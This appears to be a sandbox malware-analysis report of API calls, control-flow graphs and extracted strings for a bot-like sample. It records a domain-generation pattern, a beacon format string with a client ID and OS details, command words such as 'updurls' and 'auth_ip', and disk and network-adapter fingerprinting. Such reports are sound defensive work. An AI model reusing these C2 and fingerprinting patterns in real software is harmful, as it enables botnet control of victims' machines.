___crtGetEnvironmentStringsA 59 API calls 16814->16815 16815->16811 16817 2c54c4a ___addlocaleref ___removelocaleref 16816->16817 16819 2c54c1e 16816->16819 16817->16819 16823 2c549c5 16817->16823 16820 2c54c36 16819->16820 16853 2c58459 RtlLeaveCriticalSection 16820->16853 16822 2c54c3d 16822->16801 16824 2c54a3e 16823->16824 16827 2c549da 16823->16827 16825 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16824->16825 16826 2c54a8b 16824->16826 16829 2c54a5f 16825->16829 16828 2c5cf3d ___free_lc_time 59 API calls 16826->16828 16832 2c54ab4 16826->16832 16827->16824 16834 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16827->16834 16836 2c54a0b 16827->16836 16830 2c54aa9 16828->16830 16831 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16829->16831 16833 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16830->16833 16837 2c54a72 16831->16837 16835 2c54b13 16832->16835 16851 2c52974 59 API calls ___crtGetEnvironmentStringsA 16832->16851 16833->16832 16839 2c54a00 16834->16839 16840 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16835->16840 16841 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16836->16841 16852 2c54a29 16836->16852 16842 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16837->16842 16838 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16843 2c54a33 16838->16843 16845 2c5cdda ___free_lconv_mon 59 API calls 16839->16845 16846 2c54b19 16840->16846 16847 2c54a1e 16841->16847 16848 2c54a80 16842->16848 16844 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16843->16844 16844->16824 16845->16836 16846->16819 16849 2c5ced6 ___free_lconv_num 59 API calls 16847->16849 16850 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16848->16850 16849->16852 16850->16826 16851->16832 16852->16838 16853->16822 16857 2c58459 RtlLeaveCriticalSection 16854->16857 16856 2c54fe5 16856->16809 16857->16856 16859 2c54ff3 ___BuildCatchObject 16858->16859 16860 2c5565a ___InternalCxxFrameHandler 59 API calls 16859->16860 16861 2c54ffb 16860->16861 16862 2c54f41 __setmbcp 59 API calls 16861->16862 16863 2c55005 16862->16863 16883 2c54ce2 16863->16883 16866 2c584b6 __malloc_crt 59 API calls 16867 2c55027 16866->16867 16868 2c55154 ___BuildCatchObject 16867->16868 16890 2c5518f 16867->16890 16868->16767 16871 2c55164 16871->16868 16875 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16871->16875 16878 2c55177 16871->16878 16872 2c5505d 16874 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16872->16874 16876 2c5507d 16872->16876 16873 2c5585b __ungetc_nolock 59 API calls 16873->16868 16874->16876 16875->16878 16876->16868 16877 2c582ef __lock 59 API calls 16876->16877 16879 2c550ac 16877->16879 16878->16873 16880 2c5513a 16879->16880 16882 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16879->16882 16900 2c55159 16880->16900 16882->16880 16884 2c51c7b _LocaleUpdate::_LocaleUpdate 59 API calls 16883->16884 16885 2c54cf2 16884->16885 16886 2c54d01 GetOEMCP 16885->16886 16887 2c54d13 16885->16887 16889 2c54d2a 16886->16889 16888 2c54d18 GetACP 16887->16888 16887->16889 16888->16889 16889->16866 16889->16868 16891 2c54ce2 getSystemCP 61 API calls 16890->16891 16892 2c551ac 16891->16892 16895 2c551fd IsValidCodePage 16892->16895 16897 2c551b3 setSBCS 16892->16897 16898 2c55222 _memset __setmbcp_nolock 16892->16898 16893 2c53f4b __87except 6 API calls 16894 2c5504e 16893->16894 16894->16871 16894->16872 16896 2c5520f GetCPInfo 16895->16896 16895->16897 16896->16897 16896->16898 16897->16893 16903 2c54daf GetCPInfo 16898->16903 16969 2c58459 RtlLeaveCriticalSection 16900->16969 16902 2c55160 16902->16868 16907 2c54de7 16903->16907 16912 2c54e91 16903->16912 16906 2c53f4b __87except 6 API calls 16909 2c54f3d 16906->16909 16913 2c5d61d 16907->16913 16909->16897 16911 2c5d4c1 ___crtLCMapStringA 63 API calls 16911->16912 16912->16906 16914 2c51c7b _LocaleUpdate::_LocaleUpdate 59 API calls 16913->16914 16915 2c5d62e 16914->16915 16923 2c5d525 16915->16923 16918 2c5d4c1 16919 2c51c7b _LocaleUpdate::_LocaleUpdate 59 API calls 16918->16919 16920 2c5d4d2 16919->16920 16940 2c5d2bd 16920->16940 16924 2c5d54c MultiByteToWideChar 16923->16924 16925 2c5d53f 16923->16925 16929 2c5d578 16924->16929 16935 2c5d571 16924->16935 16925->16924 16926 2c53f4b __87except 6 API calls 16927 2c54e48 16926->16927 16927->16918 16928 2c5d59a _memset 16931 2c5d5d6 MultiByteToWideChar 16928->16931 16928->16935 16929->16928 16930 2c529ac _malloc 59 API calls 16929->16930 16930->16928 16932 2c5d600 16931->16932 16933 2c5d5f0 GetStringTypeW 16931->16933 16936 2c5d507 16932->16936 16933->16932 16935->16926 16937 2c5d511 16936->16937 16938 2c5d522 16936->16938 16937->16938 16939 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16937->16939 16938->16935 16939->16938 16942 2c5d2d6 MultiByteToWideChar 16940->16942 16943 2c5d335 16942->16943 16947 2c5d33c 16942->16947 16944 2c53f4b __87except 6 API calls 16943->16944 16945 2c54e69 16944->16945 16945->16911 16946 2c5d39b MultiByteToWideChar 16948 2c5d402 16946->16948 16949 2c5d3b4 16946->16949 16950 2c529ac _malloc 59 API calls 16947->16950 16953 2c5d364 16947->16953 16952 2c5d507 __freea 59 API calls 16948->16952 16965 2c5f0e8 16949->16965 16950->16953 16952->16943 16953->16943 16953->16946 16954 2c5d3c8 16954->16948 16955 2c5d3de 16954->16955 16957 2c5d40a 16954->16957 16955->16948 16956 2c5f0e8 __crtLCMapStringA_stat LCMapStringW 16955->16956 16956->16948 16960 2c529ac _malloc 59 API calls 16957->16960 16963 2c5d432 16957->16963 16958 2c5f0e8 __crtLCMapStringA_stat LCMapStringW 16959 2c5d475 16958->16959 16961 2c5d49d 16959->16961 16964 2c5d48f WideCharToMultiByte 16959->16964 16960->16963 16962 2c5d507 __freea 59 API calls 16961->16962 16962->16948 16963->16948 16963->16958 16964->16961 16966 2c5f113 __crtLCMapStringA_stat 16965->16966 16967 2c5f0f8 16965->16967 16968 2c5f12a LCMapStringW 16966->16968 16967->16954 16968->16954 16969->16902 16971 2c566d5 16970->16971 16972 2c566c7 16970->16972 16973 2c5585b __ungetc_nolock 59 API calls 16971->16973 16972->16971 16976 2c566eb 16972->16976 16974 2c566dc 16973->16974 16975 2c548f5 __ungetc_nolock 9 API calls 16974->16975 16977 2c566e6 16975->16977 16976->16977 16978 2c5585b __ungetc_nolock 59 API calls 16976->16978 16977->16677 16978->16974 16980 2c5cce2 RtlEncodePointer 16979->16980 16980->16980 16981 2c5ccfc 16980->16981 16981->16687 16983 2c58bc3 TlsFree 16982->16983 16984 2c58bbf 16982->16984 16983->16693 16984->16693 16987 2c554fb ___BuildCatchObject 16985->16987 16986 2c55514 16990 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16986->16990 16991 2c55523 16986->16991 16987->16986 16988 2c55603 ___BuildCatchObject 16987->16988 16989 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16987->16989 16988->16742 16989->16986 16990->16991 16992 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16991->16992 16994 2c55532 16991->16994 16992->16994 16993 2c55541 16996 2c55550 16993->16996 16998 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16993->16998 16994->16993 16995 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16994->16995 16995->16993 16997 2c5555f 16996->16997 16999 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16996->16999 17000 2c5556e 16997->17000 17001 2c52974 ___crtGetEnvironmentStringsA 59 API calls 16997->17001 16998->16996 16999->16997 17002 2c55580 17000->17002 17003 2c52974 ___crtGetEnvironmentStringsA 59 API calls 17000->17003 17001->17000 17004 2c582ef __lock 59 API calls 17002->17004 17003->17002 17007 2c55588 17004->17007 17005 2c555ab 17017 2c5560f 17005->17017 17007->17005 17009 2c52974 ___crtGetEnvironmentStringsA 59 API calls 17007->17009 17009->17005 17010 2c582ef __lock 59 API calls 17015 2c555bf ___removelocaleref 17010->17015 17011 2c555f0 17020 2c5561b 17011->17020 17014 2c52974 ___crtGetEnvironmentStringsA 59 API calls 17014->16988 17015->17011 17016 2c549c5 ___freetlocinfo 59 API calls 17015->17016 17016->17011 17023 2c58459 RtlLeaveCriticalSection 17017->17023 17019 2c555b8 17019->17010 17024 2c58459 RtlLeaveCriticalSection 17020->17024 17022 2c555fd 17022->17014 17023->17019 17024->17022
                                                                                    APIs
                                                                                    • RtlInitializeCriticalSection.NTDLL(02C773D8), ref: 02C45F43
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C45F5A
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F63
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C45F72
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F75
                                                                                      • Part of subcall function 02C4F1E7: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00000000,00000000), ref: 02C4F235
                                                                                      • Part of subcall function 02C4F1E7: CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 02C4F256
                                                                                      • Part of subcall function 02C4F1E7: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 02C4F26A
                                                                                      • Part of subcall function 02C4F1E7: CloseHandle.KERNEL32(00000000), ref: 02C4F273
                                                                                    • GetTickCount.KERNEL32 ref: 02C45FB6
                                                                                    • GetVersionExA.KERNEL32(02C77030), ref: 02C45FE3
                                                                                    • _memset.LIBCMT ref: 02C46000
                                                                                    • _malloc.LIBCMT ref: 02C4600D
                                                                                    • _malloc.LIBCMT ref: 02C4601D
                                                                                    • _malloc.LIBCMT ref: 02C4602B
                                                                                    • _malloc.LIBCMT ref: 02C46036
                                                                                    • _malloc.LIBCMT ref: 02C46041
                                                                                    • _malloc.LIBCMT ref: 02C4604C
                                                                                    • _malloc.LIBCMT ref: 02C46057
                                                                                    • _malloc.LIBCMT ref: 02C46066
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C4607D
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46086
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C46095
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46098
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C460A3
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C460A6
                                                                                    • _memset.LIBCMT ref: 02C460B9
                                                                                    • _memset.LIBCMT ref: 02C460C5
                                                                                    • _memset.LIBCMT ref: 02C460D2
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C460E0
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C460ED
                                                                                    • _malloc.LIBCMT ref: 02C46111
                                                                                      • Part of subcall function 02C529AC: __FF_MSGBANNER.LIBCMT ref: 02C529C3
                                                                                      • Part of subcall function 02C529AC: __NMSG_WRITE.LIBCMT ref: 02C529CA
                                                                                      • Part of subcall function 02C529AC: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001), ref: 02C529EF
                                                                                    • _malloc.LIBCMT ref: 02C4611F
                                                                                    • _malloc.LIBCMT ref: 02C46126
                                                                                    • _malloc.LIBCMT ref: 02C4614A
                                                                                    • QueryPerformanceCounter.KERNEL32(00000200), ref: 02C4615A
                                                                                    • Sleep.KERNELBASE ref: 02C46168
                                                                                    • _malloc.LIBCMT ref: 02C46174
                                                                                    • _malloc.LIBCMT ref: 02C46181
                                                                                    • _memset.LIBCMT ref: 02C46196
                                                                                    • _memset.LIBCMT ref: 02C461A6
                                                                                    • Sleep.KERNELBASE(00001388), ref: 02C461C2
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C461CD
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C461DE
                                                                                    • _memset.LIBCMT ref: 02C46233
                                                                                    • _memset.LIBCMT ref: 02C46242
                                                                                    • GetTickCount.KERNEL32 ref: 02C462E5
                                                                                    • _memset.LIBCMT ref: 02C4630F
                                                                                    • wsprintfA.USER32 ref: 02C46C3B
                                                                                    • _memset.LIBCMT ref: 02C46C5C
                                                                                    • _memset.LIBCMT ref: 02C46C6C
                                                                                    • _memset.LIBCMT ref: 02C46C9B
                                                                                    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02C46D3D
                                                                                    • InternetSetOptionA.WININET(00000000,00000002,?), ref: 02C46D65
                                                                                    • InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02C46D7D
                                                                                    • InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02C46D95
                                                                                    • _memset.LIBCMT ref: 02C46DA5
                                                                                    • InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200,00000000), ref: 02C46DBE
                                                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 02C46DDD
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C46DF7
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02C46E02
                                                                                    • _memset.LIBCMT ref: 02C46E4D
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C46E72
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C46E83
                                                                                    • _malloc.LIBCMT ref: 02C46F0A
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C46F1C
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C46F28
                                                                                    • _memset.LIBCMT ref: 02C46F42
                                                                                    • _memset.LIBCMT ref: 02C46F51
                                                                                    • _memset.LIBCMT ref: 02C46F61
                                                                                    • _memset.LIBCMT ref: 02C46F70
                                                                                    • _memset.LIBCMT ref: 02C46F82
                                                                                    • _malloc.LIBCMT ref: 02C46FFC
                                                                                    • _memset.LIBCMT ref: 02C4700D
                                                                                    • _strtok.LIBCMT ref: 02C4702D
                                                                                    • _swscanf.LIBCMT ref: 02C47044
                                                                                    • _strtok.LIBCMT ref: 02C4705B
                                                                                    • Sleep.KERNEL32(000007D0), ref: 02C47162
                                                                                    • _memset.LIBCMT ref: 02C471D6
                                                                                    • RtlEnterCriticalSection.NTDLL(02C773D8), ref: 02C471E3
                                                                                    • RtlLeaveCriticalSection.NTDLL(02C773D8), ref: 02C471F5
                                                                                    • _sprintf.LIBCMT ref: 02C4728A
                                                                                    • RtlEnterCriticalSection.NTDLL(00000020), ref: 02C4734E
                                                                                    • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02C47382
                                                                                      • Part of subcall function 02C45D1D: _malloc.LIBCMT ref: 02C45D2B
                                                                                    • _malloc.LIBCMT ref: 02C47583
                                                                                    • _memset.LIBCMT ref: 02C4758F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset$_malloc$CriticalSection$Internet$Heap$EnterLeave$Handle$Allocate$CloseFileOptionProcessSleep$AddressCountModuleOpenProcTick_strtok$CounterCreateDirectoryInitializePerformanceQueryReadTimeVersionWindows_sprintf_swscanfwsprintf
                                                                                    • String ID: $%d;$/click/?counter=$<htm$Host: %s$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$a%c%c%c%c%c%c.ru$auth_ip$auth_swith$b%c%c%c%c%c%c.com$block$c%c%c%c%c%c%c.net$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$connect$d%c%c%c%c%c%c.info$disconnect$e%c%c%c%c%c%c.ua$f%c%c%c%c%c%c.ru$g%c%c%c%c%c%c.com$h%c%c%c%c%c%c.net$http://$i%c%c%c%c%c%c.info$i4hiea56#7b&dfw3$idle$j%c%c%c%c%c%c.info$k%c%c%c%c%c%c.ua$l%c%c%c%c%c%c.ru$m%c%c%c%c%c%c.com$n%c%c%c%c%c%c.net$ntdll.dll$o%c%c%c%c%c%c.info$p%c%c%c%c%c%c.ua$q%c%c%c%c%c%c.ru$r%c%c%c%c%c%c.com$s%c%c%c%c%c%c.net$sprintf$strcat$t%c%c%c%c%c%c.info$u%c%c%c%c%c%c.ua$updips$updurls$urls$v%c%c%c%c%c%c.ru$w%c%c%c%c%c%c.com$x%c%c%c%c%c%c.net$y%c%c%c%c%c%c.info$z%c%c%c%c%c%c.ua
                                                                                    • API String ID: 2018021302-1381308451
                                                                                    • Opcode ID: b391904ee28ecd93b675c32ba0629b9339e00344e0a5aa5718f1a4342054773e
                                                                                    • Instruction ID: ae938776c8b5a5596eafecf4a29edd79c886570833847600ded0764432ed6c77
                                                                                    • Opcode Fuzzy Hash: b391904ee28ecd93b675c32ba0629b9339e00344e0a5aa5718f1a4342054773e
                                                                                    • Instruction Fuzzy Hash: 07D219B36187905ED3159B2C9C81B7FFBECAB89308F58093DF5D5C6142CA28C606DB92
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc$AddressHandleModuleProc$CountCriticalHeapInitializeProcessSectionTickVersion_memset
                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$i4hiea56#7b&dfw3$ntdll.dll$sprintf$strcat$w%c%c%c%c%c%c.com
                                                                                    • API String ID: 2339383661-2290804818
                                                                                    • Opcode ID: 4902d3046e3600d51c830d48658b7e10fddc97c2c3d723c13141819e2b47d8b1
                                                                                    • Instruction ID: 78387564b09908bb51d7c479f8ae8f5555bc3afe1c228a90e4d9056a1f0698f8
                                                                                    • Opcode Fuzzy Hash: 4902d3046e3600d51c830d48658b7e10fddc97c2c3d723c13141819e2b47d8b1
                                                                                    • Instruction Fuzzy Hash: 8FD138B2D44350AFD720AF34AC48B6FBBE8EF89714F14092DFA8497241DB748945CB96
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02C45F5A
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F63
                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02C45F72
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C45F75
                                                                                    • GetTickCount.KERNEL32 ref: 02C45FB6
                                                                                    • GetVersionExA.KERNEL32(02C77030), ref: 02C45FE3
                                                                                    • _memset.LIBCMT ref: 02C46000
                                                                                    • _malloc.LIBCMT ref: 02C4600D
                                                                                    • _malloc.LIBCMT ref: 02C4601D
                                                                                    • _malloc.LIBCMT ref: 02C4602B
                                                                                    • _malloc.LIBCMT ref: 02C46036
                                                                                    • _malloc.LIBCMT ref: 02C46041
                                                                                    • _malloc.LIBCMT ref: 02C4604C
                                                                                    • _malloc.LIBCMT ref: 02C46057
                                                                                    • _malloc.LIBCMT ref: 02C46066
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000004), ref: 02C4607D
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46086
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C46095
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C46098
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000400), ref: 02C460A3
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C460A6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _malloc$Heap$AllocateProcess$AddressHandleModuleProc$CountTickVersion_memset
                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$client_id=%.8x&connected=%d&server_port=%d&debug=%d&os=%d.%d.%04d&dgt=%d&dti=%d$i4hiea56#7b&dfw3$ntdll.dll$sprintf$strcat$w%c%c%c%c%c%c.com
                                                                                    • API String ID: 822168373-2290804818
                                                                                    • Opcode ID: 87aab8db4b7662471619f8fde7bbb6fdbd9635f982fd64d0e523b544d4d5205e
                                                                                    • Instruction ID: f7f6d9c3390279ad6138bb24df0e354b349391b69f3acdb56ef469b85d0238f4
                                                                                    • Opcode Fuzzy Hash: 87aab8db4b7662471619f8fde7bbb6fdbd9635f982fd64d0e523b544d4d5205e
                                                                                    • Instruction Fuzzy Hash: 0FD12772E48350AFD721AF349C44B6BBBE8EF89314F14092DFA84D7281DB748945CB96

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1174 2c4f3a0-2c4f3c3 LoadLibraryA 1175 2c4f483-2c4f48a 1174->1175 1176 2c4f3c9-2c4f3d7 GetProcAddress 1174->1176 1177 2c4f47c-2c4f47d FreeLibrary 1176->1177 1178 2c4f3dd-2c4f3ed 1176->1178 1177->1175 1179 2c4f3ef-2c4f3fb GetAdaptersInfo 1178->1179 1180 2c4f433-2c4f43b 1179->1180 1181 2c4f3fd 1179->1181 1182 2c4f444-2c4f449 1180->1182 1183 2c4f43d-2c4f443 call 2c531a8 1180->1183 1184 2c4f3ff-2c4f406 1181->1184 1188 2c4f477-2c4f47b 1182->1188 1189 2c4f44b-2c4f44e 1182->1189 1183->1182 1185 2c4f410-2c4f418 1184->1185 1186 2c4f408-2c4f40c 1184->1186 1191 2c4f41b-2c4f420 1185->1191 1186->1184 1190 2c4f40e 1186->1190 1188->1177 1189->1188 1193 2c4f450-2c4f455 1189->1193 1190->1180 1191->1191 1194 2c4f422-2c4f42f call 2c4f082 1191->1194 1195 2c4f457-2c4f45f 1193->1195 1196 2c4f462-2c4f46d call 2c5354c 1193->1196 1194->1180 1195->1196 1196->1188 1201 2c4f46f-2c4f472 1196->1201 1201->1179
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(iphlpapi.dll,?), ref: 02C4F3B6
                                                                                    • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02C4F3CF
                                                                                    • GetAdaptersInfo.IPHLPAPI(?,00000000,?,00000000), ref: 02C4F3F4
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 02C4F47D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                    • String ID: GetAdaptersInfo$iphlpapi.dll
                                                                                    • API String ID: 514930453-3114217049
                                                                                    • Opcode ID: 3a70d2104b52ca7243d47f63eb0bcc8f0c0167c2d7d963def21d44f2211e5ed3
                                                                                    • Instruction ID: 74e4365797deee9144f251408a6a0195b3e447b18347cc9d866183524af33dcd
                                                                                    • Opcode Fuzzy Hash: 3a70d2104b52ca7243d47f63eb0bcc8f0c0167c2d7d963def21d44f2211e5ed3
                                                                                    • Instruction Fuzzy Hash: 2A21C371E042099BDB10CAA9D8846EFBBF8EF44308F4441ADE945E7601DF348A45CAA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1202 2c42b95-2c42baf 1203 2c42bc7-2c42bcb 1202->1203 1204 2c42bb1-2c42bb9 call 2c50510 1202->1204 1206 2c42bcd-2c42bd0 1203->1206 1207 2c42bdf 1203->1207 1211 2c42bbf-2c42bc2 1204->1211 1206->1207 1209 2c42bd2-2c42bdd call 2c50510 1206->1209 1210 2c42be2-2c42c11 WSASetLastError WSARecv call 2c49e92 1207->1210 1209->1211 1216 2c42c16-2c42c1d 1210->1216 1214 2c42d30 1211->1214 1217 2c42d32-2c42d38 1214->1217 1218 2c42c2c-2c42c32 1216->1218 1219 2c42c1f-2c42c2a call 2c50510 1216->1219 1220 2c42c34-2c42c39 call 2c50510 1218->1220 1221 2c42c46-2c42c48 1218->1221 1230 2c42c3f-2c42c42 1219->1230 1220->1230 1224 2c42c4f-2c42c60 call 2c50510 1221->1224 1225 2c42c4a-2c42c4d 1221->1225 1224->1217 1228 2c42c66-2c42c69 1224->1228 1225->1228 1232 2c42c73-2c42c76 1228->1232 1233 2c42c6b-2c42c6d 1228->1233 1230->1221 1232->1214 1235 2c42c7c-2c42c9a call 2c50510 call 2c4166f 1232->1235 1233->1232 1234 2c42d22-2c42d2d call 2c41996 1233->1234 1234->1214 1242 2c42cbc-2c42cfa WSASetLastError select call 2c49e92 1235->1242 1243 2c42c9c-2c42cba call 2c50510 call 2c4166f 1235->1243 1249 2c42cfc-2c42d06 call 2c50510 1242->1249 1250 2c42d08 1242->1250 1243->1214 1243->1242 1255 2c42d19-2c42d1d 1249->1255 1253 2c42d15-2c42d17 1250->1253 1254 2c42d0a-2c42d12 call 2c50510 1250->1254 1253->1214 1253->1255 1254->1253 1255->1210
                                                                                    APIs
                                                                                    • WSASetLastError.WS2_32(00000000,00000000,505C3A43,00000000), ref: 02C42BE4
                                                                                    • WSARecv.WS2_32(?,?,00000002,?,?,00000000,00000000), ref: 02C42C07
                                                                                      • Part of subcall function 02C49E92: WSAGetLastError.WS2_32(?,00000080,00000017,02C43114), ref: 02C49EA0
                                                                                    • WSASetLastError.WS2_32(?,?,?,?,00000000), ref: 02C42CD3
                                                                                    • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02C42CE7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$Recvselect
                                                                                    • String ID: 3'
                                                                                    • API String ID: 886190287-280543908
                                                                                    • Opcode ID: 2b29920453257d087a504b1c5edbe903a1aa3c04ec4d03b79309de9743153e84
                                                                                    • Instruction ID: 436e1b2d7f470d68e2b0aca823427504b32424fc66ee58a34a7f8eaa5c33e85f
                                                                                    • Opcode Fuzzy Hash: 2b29920453257d087a504b1c5edbe903a1aa3c04ec4d03b79309de9743153e84
                                                                                    • Instruction Fuzzy Hash: 724146B19043059FD7109F65C90576BBBE9AF88364F104D1EF899C7280EBB0D680CBA6

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1259 2c4f29c-2c4f2c7 CreateFileA 1260 2c4f2cd-2c4f2e2 1259->1260 1261 2c4f398-2c4f39f 1259->1261 1262 2c4f2e5-2c4f307 DeviceIoControl 1260->1262 1263 2c4f340-2c4f348 1262->1263 1264 2c4f309-2c4f311 1262->1264 1265 2c4f351-2c4f353 1263->1265 1266 2c4f34a-2c4f350 call 2c531a8 1263->1266 1267 2c4f313-2c4f318 1264->1267 1268 2c4f31a-2c4f31f 1264->1268 1270 2c4f355-2c4f358 1265->1270 1271 2c4f38e-2c4f397 CloseHandle 1265->1271 1266->1265 1267->1263 1268->1263 1272 2c4f321-2c4f329 1268->1272 1274 2c4f374-2c4f381 call 2c5354c 1270->1274 1275 2c4f35a-2c4f363 GetLastError 1270->1275 1271->1261 1276 2c4f32c-2c4f331 1272->1276 1274->1271 1283 2c4f383-2c4f389 1274->1283 1275->1271 1277 2c4f365-2c4f368 1275->1277 1276->1276 1279 2c4f333-2c4f33f call 2c4f082 1276->1279 1277->1274 1280 2c4f36a-2c4f371 1277->1280 1279->1263 1280->1274 1283->1262
                                                                                    APIs
                                                                                    • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 02C4F2BB
                                                                                    • DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,00000000,00000000), ref: 02C4F2F9
                                                                                    • GetLastError.KERNEL32 ref: 02C4F35A
                                                                                    • CloseHandle.KERNELBASE(?), ref: 02C4F391
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                                    • String ID: \\.\PhysicalDrive0
                                                                                    • API String ID: 4026078076-1180397377
                                                                                    • Opcode ID: 545ebbd53fedba73ffcb27dc45815ba43b7da59f9014455ab6200338ebf6ec28
